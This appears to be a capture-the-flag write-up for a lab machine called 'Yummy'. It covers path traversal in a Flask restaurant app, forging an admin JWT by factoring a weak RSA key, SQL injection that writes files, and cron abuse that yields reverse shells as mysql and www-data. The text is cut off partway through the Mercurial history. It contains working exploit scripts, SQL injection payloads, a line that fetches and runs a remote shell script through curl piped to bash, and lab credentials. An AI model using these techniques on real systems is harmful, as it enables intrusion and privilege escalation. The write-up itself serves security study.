Reconnaissance

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a2:ed:65:77:e9:c4:2f:13:49:19:b0:b8:09:eb:56:36 (ECDSA)
|_  256 bc:df:25:35:5c:97:24:f2:69:b4:ce:60:17:50:3c:f0 (ED25519)
80/tcp open  http    Caddy httpd
|_http-title: Did not follow redirect to http://yummy.htb/
|_http-server-header: Caddy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Besides SSH, only HTTP is open, and it redirects to yummy.htb, so I’ll add that hostname to my /etc/hosts file.

HTTP



The webpage belongs to a restaurant and shows its menu and services. It’s possible to register, log in and book a table. Making a reservation works without an account, so I put in some random data and submit the form. The page confirms the booking and says that I can manage my appointment from within my account. This probably means that reservations are matched to accounts by name or email.

After creating a new account with the email address I used for the booking and logging in, I can see the appointment there. From there I can cancel it or download an iCalendar file to add it to my calendar.

Execution



When I download the file my browser makes a request to /reminder/21 where a new cookie is set and I’m redirected to the actual download endpoint at /export/Yummy_reservation_20241006_095812.ics.

Replaying the second request in Burp returns a 500 error, probably because the session cookie set in the first request is valid for one use only.

A closer look at the downloaded .ics file shows that it was generated with ics.py, which hints at a Python web server. The sample usage on the GitHub page writes the calendar to a file, and the response in Burp includes a Content-Disposition header, so the file was probably served from disk.

BEGIN:VCALENDAR

VERSION:2.0

PRODID:ics.py - http://git.io/lLljaA

BEGIN:VEVENT

DESCRIPTION:Email: ryuki@ctf.htb\nNumber of People: 1\nMessage: Thank you

DTSTART:20241006T000000Z

SUMMARY:ryuki

UID:fa2dd197-12cc-4902-ac24-b3721a4e15ab@fa2d.org

END:VEVENT





END:VCALENDARIf that assumption is correct it might be possible to use directory traversal to break out of the export folder and download accessible files on the server. In order to test this, I make another request to /reminder/21 and get the session cookie. Then I’ll add this cookie while requesting /export/../../../../../../../../../../etc/passwd and the webserver returns the /etc/passwd in the response, proving it’s vulnerable.
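To illustrate why this works, assume the server simply joins the requested name onto its export directory. The app.py source retrieved later confirms this: it uses os.path.join(temp_dir, filename). The sketch below shows how such a path resolves with Python's POSIX path functions. The temporary directory name is made up. normpath() is only used to display the result; the kernel resolves the ../ segments on its own when the file is opened.

```python
import posixpath

# Hypothetical name: tempfile.mkdtemp() returns a random directory below /tmp
temp_dir = "/tmp/tmpab12cd34"
# Flask's <path:filename> converter passes everything after /export/, slashes included
filename = "../../../../../../etc/passwd"

joined = posixpath.join(temp_dir, filename)
print(joined)                      # /tmp/tmpab12cd34/../../../../../../etc/passwd
print(posixpath.normpath(joined))  # /etc/passwd (extra ".." at the root are dropped)
```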

The only users with a login shell are root, dev and qa, but this does not help without a password.

Now that I know about the vulnerability, I write a simple Python script to automate the steps, because doing this manually for every file is tedious.

```python
#!/usr/bin/env python3
import requests

COOKIE = 'eyJh.... <X-AUTH-token>...'
REMINDER = 21
PROXIES = {'http': 'http://127.0.0.1:8080'}


def get_file(filepath: str, session: requests.Session) -> str:
    # Requesting the reminder first creates a fresh export directory for the next download
    session.get(f'http://yummy.htb/reminder/{REMINDER}', allow_redirects=False)
    # ../ is percent-encoded so it is not collapsed before it reaches the application
    resp = session.get('http://yummy.htb/export/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E' + filepath)
    return resp.text


def main():
    session = requests.Session()
    session.cookies.set(
        'X-AUTH-Token',
        COOKIE,
        domain='yummy.htb'
    )
    session.proxies = PROXIES

    while True:
        try:
            # Absolute path on the target, e.g. /etc/passwd
            file = input('File: ').strip()
            print(get_file(file, session))
        except KeyboardInterrupt:
            break


if __name__ == '__main__':
    main()
```

Note: Occasionally the server returns a 500 error code. Every 15 minutes the users and appointments are purged from the database. There’s no need to create another user, because the cookie stays valid for an hour, but the appointment has to be recreated.
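Since the appointment has to be recreated after every purge, a small helper can resubmit the booking form. This is a sketch. rebook() is a hypothetical addition to the script above. The form field names come from the /book route in the app.py source shown further down. All field values are placeholders.

```python
BASE = "http://yummy.htb"


def rebook(session, email: str) -> None:
    """Recreate the reservation after the 15-minute purge (hypothetical helper).

    `session` is assumed to be the requests.Session from the script above.
    """
    form = {
        "name": "ryuki",
        "date": "2024-10-06",  # generate_ics_file() parses this with "%Y-%m-%d"
        "time": "12:00",       # placeholder, stored but never parsed
        "email": email,        # must equal the email in the JWT, /reminder/<id> filters on it
        "people": "1",
        "message": "Thank you",
    }
    # /book reads request.form and does not check the cookie; it answers with a redirect
    session.post(f"{BASE}/book", data=form, allow_redirects=False)
```

The new appointment gets a new ID, so REMINDER has to be updated with the value shown on /dashboard.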

Trying to retrieve /proc/self/environ or /proc/self/cmdline fails, probably due to the null bytes separating the values in those files. Earlier I mentioned that the backend is likely written in Python, and one of the more common frameworks for that is Flask. Its entry point is conventionally called app.py. Since I don’t know where the files are located on disk, I’ll try to retrieve it through /proc/self/cwd/app.py, which points into the working directory of the server process.
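The two /proc properties involved can be checked locally on any Linux machine (not the target). Arguments in cmdline are NUL-separated, and /proc/self/cwd is a symlink to the process's working directory. This does not prove that the NUL bytes are what breaks the download; it only shows what those files contain.

```python
import os

# Linux only: /proc/self always refers to the process that reads it
with open("/proc/self/cmdline", "rb") as fp:
    cmdline = fp.read()

# Arguments are separated (and terminated) by NUL bytes, not newlines
print(b"\0" in cmdline)
print([arg.decode() for arg in cmdline.split(b"\0") if arg])

# /proc/self/cwd links to the working directory, so /proc/self/cwd/app.py
# resolves relative to wherever the server process was started
print(os.readlink("/proc/self/cwd") == os.getcwd())
```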

```python
from flask import Flask, request, send_file, render_template, redirect, url_for, flash, jsonify, make_response
import tempfile
import os
import shutil
from datetime import datetime, timedelta, timezone
from urllib.parse import quote
from ics import Calendar, Event
from middleware.verification import verify_token
from config import signature
import pymysql.cursors
from pymysql.constants import CLIENT
import jwt
import secrets
import hashlib

app = Flask(__name__, static_url_path='/static')
temp_dir = ''
app.secret_key = secrets.token_hex(32)

db_config = {
    'host': '127.0.0.1',
    'user': 'chef',
    'password': '3wDo7gSRZIwIHRxZ!',
    'database': 'yummy_db',
    'cursorclass': pymysql.cursors.DictCursor,
    'client_flag': CLIENT.MULTI_STATEMENTS
}

access_token = ''

@app.route('/login', methods=['GET','POST'])
def login():
    global access_token
    if request.method == 'GET':
        return render_template('login.html', message=None)
    elif request.method == 'POST':
        email = request.json.get('email')
        password = request.json.get('password')
        password2 = hashlib.sha256(password.encode()).hexdigest()
        if not email or not password:
            return jsonify(message="email or password is missing"), 400

        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "SELECT * FROM users WHERE email=%s AND password=%s"
                cursor.execute(sql, (email, password2))
                user = cursor.fetchone()
                if user:
                    payload = {
                        'email': email,
                        'role': user['role_id'],
                        'iat': datetime.now(timezone.utc),
                        'exp': datetime.now(timezone.utc) + timedelta(seconds=3600),
                        'jwk':{'kty': 'RSA',"n":str(signature.n),"e":signature.e}
                    }
                    access_token = jwt.encode(payload, signature.key.export_key(), algorithm='RS256')

                    response = make_response(jsonify(access_token=access_token), 200)
                    response.set_cookie('X-AUTH-Token', access_token)
                    return response
                else:
                    return jsonify(message="Invalid email or password"), 401
        finally:
            connection.close()

@app.route('/logout', methods=['GET'])
def logout():
    response = make_response(redirect('/login'))
    response.set_cookie('X-AUTH-Token', '')
    return response

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'GET':
        return render_template('register.html', message=None)
    elif request.method == 'POST':
        role_id = 'customer_' + secrets.token_hex(4)
        email = request.json.get('email')
        password = hashlib.sha256(request.json.get('password').encode()).hexdigest()
        if not email or not password:
            return jsonify(error="email or password is missing"), 400
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "SELECT * FROM users WHERE email=%s"
                cursor.execute(sql, (email,))
                existing_user = cursor.fetchone()
                if existing_user:
                    return jsonify(error="Email already exists"), 400
                else:
                    sql = "INSERT INTO users (email, password, role_id) VALUES (%s, %s, %s)"
                    cursor.execute(sql, (email, password, role_id))
                    connection.commit()
                    return jsonify(message="User registered successfully"), 201
        finally:
            connection.close()

@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template('index.html')

@app.route('/book', methods=['GET', 'POST'])
def export():
    if request.method == 'POST':
        try:
            name = request.form['name']
            date = request.form['date']
            time = request.form['time']
            email = request.form['email']
            num_people = request.form['people']
            message = request.form['message']

            connection = pymysql.connect(**db_config)
            try:
                with connection.cursor() as cursor:
                    sql = "INSERT INTO appointments (appointment_name, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES (%s, %s, %s, %s, %s, %s, %s)"
                    cursor.execute(sql, (name, email, date, time, num_people, message, 'customer'))
                    connection.commit()
                    flash('Your booking request was sent. You can manage your appointment further from your account. Thank you!', 'success')
            except Exception as e:
                print(e)
            return redirect('/#book-a-table')
        except ValueError:
            flash('Error processing your request. Please try again.', 'error')
    return render_template('index.html')

def generate_ics_file(name, date, time, email, num_people, message):
    global temp_dir
    temp_dir = tempfile.mkdtemp()
    current_date_time = datetime.now()
    formatted_date_time = current_date_time.strftime("%Y%m%d_%H%M%S")

    cal = Calendar()
    event = Event()

    event.name = name
    event.begin = datetime.strptime(date, "%Y-%m-%d")
    event.description = f"Email: {email}\nNumber of People: {num_people}\nMessage: {message}"

    cal.events.add(event)

    temp_file_path = os.path.join(temp_dir, quote('Yummy_reservation_' + formatted_date_time + '.ics'))
    with open(temp_file_path, 'w') as fp:
        fp.write(cal.serialize())

    return os.path.basename(temp_file_path)

@app.route('/export/<path:filename>')
def export_file(filename):
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    filepath = os.path.join(temp_dir, filename)
    if os.path.exists(filepath):
        content = send_file(filepath, as_attachment=True)
        shutil.rmtree(temp_dir)
        return content
    else:
        shutil.rmtree(temp_dir)
        return "File not found", 404

def validate_login():
    try:
        (email, current_role), status_code = verify_token()
        if email and status_code == 200 and current_role == "administrator":
            return current_role
        elif email and status_code == 200:
            return email
        else:
            raise Exception("Invalid token")
    except Exception as e:
        return None

@app.route('/dashboard', methods=['GET', 'POST'])
def dashboard():
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    elif validation == "administrator":
        return redirect(url_for('admindashboard'))

    connection = pymysql.connect(**db_config)
    try:
        with connection.cursor() as cursor:
            sql = "SELECT appointment_id, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s"
            cursor.execute(sql, (validation,))
            connection.commit()
            appointments = cursor.fetchall()
            appointments_sorted = sorted(appointments, key=lambda x: x['appointment_id'])
    finally:
        connection.close()

    return render_template('dashboard.html', appointments=appointments_sorted)

@app.route('/delete/<appointID>')
def delete_file(appointID):
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    elif validation == "administrator":
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "DELETE FROM appointments where appointment_id= %s;"
                cursor.execute(sql, (appointID,))
                connection.commit()

                sql = "SELECT * from appointments"
                cursor.execute(sql)
                connection.commit()
                appointments = cursor.fetchall()
        finally:
            connection.close()
        flash("Reservation deleted successfully","success")
        return redirect(url_for("admindashboard"))
    else:
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "DELETE FROM appointments WHERE appointment_id = %s AND appointment_email = %s;"
                cursor.execute(sql, (appointID, validation))
                connection.commit()

                sql = "SELECT appointment_id, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s"
                cursor.execute(sql, (validation,))
                connection.commit()
                appointments = cursor.fetchall()
        finally:
            connection.close()
        flash("Reservation deleted successfully","success")
        return redirect(url_for("dashboard"))
    flash("Something went wrong!","error")
    return redirect(url_for("dashboard"))

@app.route('/reminder/<appointID>')
def reminder_file(appointID):
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))

    connection = pymysql.connect(**db_config)
    try:
        with connection.cursor() as cursor:
            sql = "SELECT appointment_id, appointment_name, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s AND appointment_id = %s"
            result = cursor.execute(sql, (validation, appointID))
            if result != 0:
                connection.commit()
                appointments = cursor.fetchone()
                filename = generate_ics_file(appointments['appointment_name'], appointments['appointment_date'], appointments['appointment_time'], appointments['appointment_email'], appointments['appointment_people'], appointments['appointment_message'])
                connection.close()
                flash("Reservation downloaded successfully","success")
                return redirect(url_for('export_file', filename=filename))
            else:
                flash("Something went wrong!","error")
    except:
        flash("Something went wrong!","error")

    return redirect(url_for("dashboard"))

@app.route('/admindashboard', methods=['GET', 'POST'])
def admindashboard():
    validation = validate_login()
    if validation != "administrator":
        return redirect(url_for('login'))

    try:
        connection = pymysql.connect(**db_config)
        with connection.cursor() as cursor:
            sql = "SELECT * from appointments"
            cursor.execute(sql)
            connection.commit()
            appointments = cursor.fetchall()

            search_query = request.args.get('s', '')

            # added option to order the reservations
            order_query = request.args.get('o', '')

            sql = f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"
            cursor.execute(sql, ('%' + search_query + '%',))
            connection.commit()
            appointments = cursor.fetchall()
        connection.close()

        return render_template('admindashboard.html', appointments=appointments)
    except Exception as e:
        flash(str(e), 'error')
        return render_template('admindashboard.html', appointments=appointments)

if __name__ == '__main__':
    app.run(threaded=True, debug=False, host='0.0.0.0', port=3000)
```

The source code contains the credentials chef:3wDo7gSRZIwIHRxZ!, but they don’t work for any of the users in the passwd file. There’s also an admin dashboard, which is accessible when the role within the cookie is set to administrator. The cookie is created in login() and uses a variable called signature, which is imported from config/signature.py.

#!/usr/bin/python3

from Crypto.PublicKey import RSA

from cryptography.hazmat.backends import default_backend

from cryptography.hazmat.primitives import serialization

import sympy

# Generate RSA key pair

q = sympy.randprime(2**19, 2**20)

n = sympy.randprime(2**1023, 2**1024) * q

e = 65537

p = n // q

phi_n = (p - 1) * (q - 1)

d = pow(e, -1, phi_n)

key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}

key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))

private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(

private_key_bytes,

password=None,

backend=default_backend()

)



public_key = private_key.public_key()During application startup this code generates a new RSA key and that is used to sign the JWT cookie. It’s not possible to extract that value through the LFI but luckily some of the information is embedded in the cookie itself: the value of n.
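A JWT payload is only base64url-encoded, not encrypted, so the claims can be read from the X-AUTH-Token cookie without the key. Below is a minimal standard-library sketch. The helper names are my own, and the signature is deliberately not verified.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with the '=' padding stripped; restore it first
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str) -> dict:
    # header.payload.signature: only the middle part is needed (signature NOT checked)
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))


# Usage with the cookie value copied from the browser:
# claims = jwt_claims(cookie)
# n = int(claims["jwk"]["n"])   # login() stores n as a decimal string
# e = claims["jwk"]["e"]
```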

Based on the calculations in signature.py, finding q means searching for a prime between 2^19 and 2^20 that divides n without remainder. With only 524,288 candidates in that range, this is trivial to brute-force.
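To see why a 20-bit factor is fatal, here is a scaled-down sketch of the same recovery in plain Python (no sympy). The toy modulus is built the way signature.py builds it, but a roughly 30-bit prime stands in for the 1024-bit one. The helpers is_prime() and next_prime() are my own. The search cost depends only on the range of q, so it is the same for the real key.

```python
def is_prime(k: int) -> bool:
    # Trial division: fine for the toy sizes used here
    if k < 2:
        return False
    i = 2
    while i * i <= k:
        if k % i == 0:
            return False
        i += 1
    return True


def next_prime(k: int) -> int:
    while not is_prime(k):
        k += 1
    return k


e = 65537
p = next_prime(10**9)      # stands in for sympy.randprime(2**1023, 2**1024)
q = next_prime(900_000)    # 2**19 <= q < 2**20, like sympy.randprime(2**19, 2**20)
n = p * q

# Attacker side: only n and e are known (both sit in the cookie's jwk claim)
found = next(k for k in range(2**19, 2**20) if n % k == 0)
d = pow(e, -1, (n // found - 1) * (found - 1))   # modular inverse, Python 3.8+

m = 42
print(found == q, pow(pow(m, e, n), d, n) == m)  # True True
```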

```python
from sympy import isprime

n = 118292768719096555121631235949893594244170757590118741846550838358950095786766727435836707853997652209009287887856731038264497329743688283841867144865746512301173072157316223291094630498709372248394442164133934193863383782283447469539799197931417555306127661311807287287372907869300673984671557834755802859449370249

# Try possible values of q in the range 2^19 to 2^20
for q in range(2**19, 2**20):
    if n % q == 0 and isprime(q):  # Check if q divides n and q is prime
        print(f"Found q: {q}")
        break
```

Running the script produces the value 816499 for q. Next I’ll grab the relevant pieces from app.py and signature.py that let me create my own JWT.

#!/usr/bin/env python3

# pip install pyjwt pycryptodome sympy

import jwt

import sympy

from Crypto.PublicKey import RSA

from cryptography.hazmat.backends import default_backend

from cryptography.hazmat.primitives import serialization

from datetime import datetime, timedelta, timezone

"""

Taken from signature.py

"""

# q = sympy.randprime(2**19, 2**20)

q = 816499

# n = sympy.randprime(2**1023, 2**1024) * q

n = 118292768719096555121631235949893594244170757590118741846550838358950095786766727435836707853997652209009287887856731038264497329743688283841867144865746512301173072157316223291094630498709372248394442164133934193863383782283447469539799197931417555306127661311807287287372907869300673984671557834755802859449370249

e = 65537

p = n // q

phi_n = (p - 1) * (q - 1)

d = pow(e, -1, phi_n)

key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}

key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))

private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(

private_key_bytes,

password=None,

backend=default_backend()

)

public_key = private_key.public_key()

"""

Taken from app.py

"""

payload = {

'email': 'admin@yummy.htb',

'role': 'administrator',

'iat': datetime.now(timezone.utc),

'exp': datetime.now(timezone.utc) + timedelta(days=365),

'jwk':{'kty': 'RSA',"n":str(n),"e":e}

}

access_token = jwt.encode(payload, key.export_key(), algorithm='RS256')



print(access_token)The above script creates a new RSA key and uses that to sign my payload where I set the role to administrator and the validity to one year. Applying this cookie to my session and browsing to /dashboard redirects me to /admindashboard. There I get an overview over all appointments in the application, allowing me to cancel any of them and search through by email.





Since I have access to the source code, I quickly find an SQL injection in the search functionality. A search uses two parameters. The first is s, which holds the search term and is passed as a bound query parameter. The second is o, which controls the order of the results. Through the webpage, o is either ASC or DESC, but it is inserted into the query with an f-string without any sanitization.

```python
# --- snip ---
@app.route('/admindashboard', methods=['GET', 'POST'])
def admindashboard():
    validation = validate_login()
    if validation != "administrator":
        return redirect(url_for('login'))

    try:
        connection = pymysql.connect(**db_config)
        with connection.cursor() as cursor:
            sql = "SELECT * from appointments"
            cursor.execute(sql)
            connection.commit()
            appointments = cursor.fetchall()

            search_query = request.args.get('s', '')

            # added option to order the reservations
            order_query = request.args.get('o', '')

            sql = f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"
            cursor.execute(sql, ('%' + search_query + '%',))
            connection.commit()
            appointments = cursor.fetchall()
        connection.close()

        return render_template('admindashboard.html', appointments=appointments)
    except Exception as e:
        flash(str(e), 'error')
        return render_template('admindashboard.html', appointments=appointments)
# --- snip ---
```

I run a search, intercept the request in Burp and change it to o='. The response contains a rather verbose error message, because admindashboard() flashes the exception text back to the page. This means I can extract information from the database through error-based injection with EXTRACTVALUE.
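The sketch below shows where the value of o ends up. It rebuilds the final SQL string with the same f-string as admindashboard() and URL-encodes the payload for the query string. build_order_query() is a hypothetical helper. pymysql applies Python %-formatting to the query when arguments are passed, so a bare % inside o would likely break the query before it reaches MySQL.

```python
from urllib.parse import urlencode


def build_order_query(order_query: str) -> str:
    # Same f-string as admindashboard(): s is bound by pymysql, o is pasted in verbatim
    return f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"


payload = "AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT email FROM users LIMIT 0,1)))-- -"

print(build_order_query("'"))     # unbalanced quote -> MySQL syntax error, flashed back
print(build_order_query(payload))

# Query string for GET /admindashboard; spaces become '+', brackets and commas are %-encoded
print("/admindashboard?" + urlencode({"s": "", "o": payload}))
```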

According to the login() function, the users are stored in a table called users with the columns email and password, so I’ll save myself the trouble of enumerating the database.

```sql
AND EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT email FROM users LIMIT 0,1)))-- -
```

There is no error in the response, which is odd. Going back to the login prompt in a private window and trying to log in again fails: the user was deleted. After creating a new user and running the above query again, I do get a result. This means that there are no other users in the database, so finding hashes to crack has become highly unlikely.

Next I’ll check which user runs the queries and which privileges it has. The user, already known from the source code, is confirmed to be chef@localhost. It also has the FILE privilege, which allows reading and writing files on the server [1].

I already have read access through the LFI, and there’s nothing to write just yet.

```sql
AND EXTRACTVALUE(0x0a, CONCAT(0x0a,user()))-- -
AND EXTRACTVALUE(0x0a, CONCAT(0x0a,(SELECT privilege_type FROM information_schema.user_privileges)))-- -
```

I return to the local file read, since it’s more convenient than reading files through the SQL injection, and enumerate the system more thoroughly. Appointments and users disappear regularly, which suggests some kind of automation, so I eventually check the global crontab at /etc/crontab.

```
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root	cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6	* * 7	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh
*/15 * * * * mysql /bin/bash /data/scripts/table_cleanup.sh
* * * * * mysql /bin/bash /data/scripts/dbmonitor.sh
```

Every minute, the script /data/scripts/app_backup.sh runs as the www-data user. It backs up the contents of /opt/app into /var/www/backupapp.zip. I could grab the full source code of the application from there. One way is to extract the archive from the response in Burp. Another is to have the lfi.py script write the response to a file instead of printing it.
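For the second option, get_file() has to keep the raw bytes. resp.text would decode the ZIP archive as text and corrupt it. Below is a sketch of a variant for the LFI script. save_file() and list_archive() are hypothetical helpers, and session is assumed to be the requests.Session set up in main().

```python
import zipfile
from pathlib import Path

REMINDER = 21  # appointment ID; must still exist (see the purge note)
TRAVERSAL = 'http://yummy.htb/export/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E'


def save_file(filepath: str, session, outfile: str) -> int:
    # Same two requests as get_file(), but the body is written to disk unmodified
    session.get(f'http://yummy.htb/reminder/{REMINDER}', allow_redirects=False)
    resp = session.get(TRAVERSAL + filepath)
    Path(outfile).write_bytes(resp.content)  # bytes, not resp.text
    return len(resp.content)


def list_archive(path: str) -> list:
    # Sanity check that the download is an intact ZIP archive
    if not zipfile.is_zipfile(path):
        return []
    with zipfile.ZipFile(path) as zf:
        return zf.namelist()


# Usage: save_file('/var/www/backupapp.zip', session, 'backupapp.zip')
#        print(list_archive('backupapp.zip'))
```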

```bash
#!/bin/bash

cd /var/www
/usr/bin/rm backupapp.zip
/usr/bin/zip -r backupapp.zip /opt/app
```

Every 15 minutes, /data/scripts/table_cleanup.sh resets the database by loading a SQL file. The file truncates the users and appointments tables and reloads the appointments visible in the admin dashboard.

```bash
#!/bin/sh

/usr/bin/mysql -h localhost -u chef yummy_db -p'3wDo7gSRZIwIHRxZ!' < /data/scripts/sqlappointments.sql
```

The user mysql also runs /data/scripts/dbmonitor.sh every minute, which performs some kind of health check on the database. First it checks whether the mysql service is active. It is, and I’m unlikely to crash it, so I ignore that branch. While the service is running, the script checks whether /data/scripts/dbstatus.json exists and greps it for "database is down". If the file exists but does not contain this string, the script removes it and looks for files starting with fixer-v in /data/scripts/. The file with the highest version number (according to sort -V) is passed to bash.

```bash
#!/bin/bash

timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)

if [ "$response" != 'active' ]; then
    /usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
    /usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
    latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
    /bin/bash "$latest_version"
else
    if [ -f /data/scripts/dbstatus.json ]; then
        if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
            /usr/bin/echo "The database was down at $timestamp. Sending notification."
            /usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
            /usr/bin/rm -f /data/scripts/dbstatus.json
        else
            /usr/bin/rm -f /data/scripts/dbstatus.json
            /usr/bin/echo "The automation failed in some way, attempting to fix it."
            latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
            /bin/bash "$latest_version"
        fi
    else
        /usr/bin/echo "Response is OK."
    fi
fi

[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json
```

So if I can write to dbstatus.json and place my command into a file such as fixer-v999999, the script should pass it to bash on its next run. The FILE privilege on the database makes this possible. The connection uses the MULTI_STATEMENTS flag, so I can simply append my own statements after the original query [2].
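Both conditions can be double-checked in Python before firing the payload. version_key() is only a rough approximation of GNU sort -V: digit runs compare numerically and everything else compares as text. fixer_runs() is a hypothetical helper that mirrors the else branch of dbmonitor.sh.

```python
import re


def version_key(name: str):
    # Rough stand-in for `sort -V`: (0, number) for digit runs, (1, text) otherwise
    return [(0, int(tok), "") if tok.isdigit() else (1, 0, tok)
            for tok in re.findall(r"\d+|\D+", name)]


def fixer_runs(dbstatus_text):
    # None means dbstatus.json is missing ("Response is OK."); otherwise the fixer
    # runs unless grep finds "database is down"
    return dbstatus_text is not None and "database is down" not in dbstatus_text


candidates = ["/data/scripts/fixer-v1.0.1.sh", "/data/scripts/fixer-v999999"]
latest = sorted(candidates, key=version_key)[-1]  # mirrors `sort -V | tail -n 1`
print(latest)                  # /data/scripts/fixer-v999999
print(fixer_runs("active\n"))  # True
```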

```sql
;SELECT "curl 10.10.10.10/shell.sh|bash" INTO OUTFILE "/data/scripts/fixer-v999999";SELECT "active" INTO OUTFILE "/data/scripts/dbstatus.json";-- -
```

The first statement creates a new file with a command that fetches a reverse shell script from my web server and pipes it to bash, which avoids problems with special characters. The second statement writes active to dbstatus.json. After running the query through the SQL injection, requesting these files through the LFI returns 500 errors. A missing file would return a 404 instead, so the files were created, but I lack the permissions to read them.

After waiting for up to a minute until the next execution, I receive a callback as mysql.

Privilege Escalation

Shell as www-data

With the interactive shell, I check /data/scripts for any other interesting files. Besides the known ones there’s only fixer-v1.0.1.sh, which I’m not able to read. The directory permissions are more interesting: the directory is world-writable and has no sticky bit. So even though I cannot write to the files themselves, I can delete them.

```
ls -la /data/scripts

total 32
drwxrwxrwx 2 root root 4096 Oct  6 15:00 .
drwxr-xr-x 3 root root 4096 Sep 30 08:16 ..
-rw-r--r-- 1 root root   90 Oct  6 14:21 app_backup.sh
-rw-r--r-- 1 root root 1336 Sep 26 15:31 dbmonitor.sh
-rw-r----- 1 root root   60 Oct  6 15:00 fixer-v1.0.1.sh
-rw-r--r-- 1 root root 5570 Sep 26 15:31 sqlappointments.sql
-rw-r--r-- 1 root root  114 Sep 26 15:31 table_cleanup.sh
```

I remove the app_backup.sh file and replace it with my own script containing a reverse shell. The cron job runs every minute, and shortly afterwards I receive a shell as www-data.
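Here is a single-user sketch of the rule at play. Deleting a file is an operation on the directory entry, so it needs write and execute permission on the directory, not on the file. On the box the files belong to root; the missing sticky bit is what lets another user remove them. This demo cannot show the cross-user part. It only checks the mode bits and shows that a read-only file in such a directory can be removed and replaced.

```python
import os
import stat
import tempfile

with tempfile.TemporaryDirectory() as scripts:
    os.chmod(scripts, 0o777)  # drwxrwxrwx like /data/scripts, no sticky bit
    target = os.path.join(scripts, "app_backup.sh")
    with open(target, "w") as fp:
        fp.write("#!/bin/bash\n")
    os.chmod(target, 0o444)   # the file itself is read-only

    mode = os.stat(scripts).st_mode
    print(bool(mode & stat.S_IWOTH), bool(mode & stat.S_ISVTX))  # True False

    # unlink() only needs write + execute on the directory
    os.remove(target)
    with open(target, "w") as fp:  # a fresh file with new contents
        fp.write("#!/bin/bash\n# replacement script\n")
    replaced = os.path.exists(target)
    print(replaced)  # True
```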

Shell as qa

Within www-data’s home directory (/var/www/), I find an interesting folder called qatesting. It appears to contain the source code of the application running on port 80. The .hg folder inside marks it as a Mercurial repository, a version control system similar to Git.

This allows me to list the history with hg log, which shows 10 commits (changesets 0 to 9). The changes introduced by the last commit reveal the credentials for the qa user: jPAd!XQCtn8Oc@2B. They are still valid, and I can switch users with su qa.

```
hg log

changeset:   9:f3787cac6111
tag:         tip
user:        qa
date:        Tue May 28 10:37:16 2024 -0400
summary:     attempt at patching path traversal

changeset:   8:0bbf8464d2d2
user:        qa
date:        Tue May 28 10:34:38 2024 -0400
summary:     removed comments

changeset:   7:2ec0ee295b83
user:        qa
